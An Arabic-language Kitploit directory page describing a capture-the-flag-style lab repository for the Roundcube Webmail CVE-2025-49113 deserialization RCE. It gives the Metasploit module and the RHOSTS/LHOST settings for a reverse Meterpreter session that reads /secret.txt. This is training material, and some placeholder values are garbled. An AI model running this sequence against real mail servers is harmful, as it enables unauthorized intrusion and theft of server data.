Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولات
مختبرات وتدريب عملي
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

مختبر استغلال عملي لـ Roundcube Webmail CVE-2025-49113 (إلغاء تسلسل كائنات PHP بعد المصادقة ← RCE) لقراءة /secret.txt.

عرض المستودع
3منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

"إخلاء مسؤولية: للاستخدام التعليمي فقط"

مختبر Roundcube Webmail RCE – CVE-2025-49113

يوثّق هذا المستودع استغلالي خطوة بخطوة لثغرة Roundcube Webmail CVE-2025-49113 في مختبر خاضع للتحكم للحصول على السر المخزَّن في /secret.txt.

⚠️ إخلاء مسؤولية
تم تنفيذ جميع الأعمال في بيئة مختبر / تدريب مُصرَّح لي باختبارها.
لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو لا تديرها.


التحدي

Roundcube Webmail هو عميل بريد إلكتروني مفتوح المصدر يعمل عبر المتصفح بلغة PHP، ويتصل بصناديق البريد عبر IMAP ويرسل البريد عبر SMTP. يعمل عادةً على Apache أو Nginx مع MySQL/PostgreSQL/SQLite ويُستخدم على نطاق واسع في بيئات الاستضافة المشتركة.

الثغرة – CVE-2025-49113

تحتوي جميع إصدارات Roundcube حتى الإصدار 1.6.10 ضمناً (وإصدارات 1.5.x قبل 1.5.10) على خطأ حرج في program/actions/settings/upload.php. لا يتم التحقق من المعامل _from بشكل صحيح، مما يسمح لمهاجم مُصادَق بتشغيل وتحقيق بصلاحيات خادم الويب.

إلغاء تسلسل كائنات PHP غير آمن
تنفيذ تعليمات برمجية عن بُعد

بيانات اعتماد المختبر:

  • اسم المستخدم: roundcube
  • كلمة المرور: rcpass

الهدف:

ما هو السر الموجود داخل ملف /secret.txt؟


بيئة المختبر

  • جهاز المهاجم: Kali / HackerBox يتضمن:
    • nmap
    • msfconsole (Metasploit 6)
  • الجهاز المستهدف: Roundcube Webmail على 172.20.2.57
  • الاستغلال المستخدم: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

الشرح التفصيلي

الخطوة 1 – اكتشاف الخدمات باستخدام Nmap

الأمر: nmap -sV Target Machine

الخطوة 2 - العثور على استغلال إلغاء تسلسل كائنات PHP في Metasploit

search php object deserialization

الخطوة 3 - تكوين وحدة استغلال Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

الخطوة 4 - الحصول على جلسة Meterpreter وقراءة /secret.txt

meterpreter > cat /secret.txt

تنزيل الأداة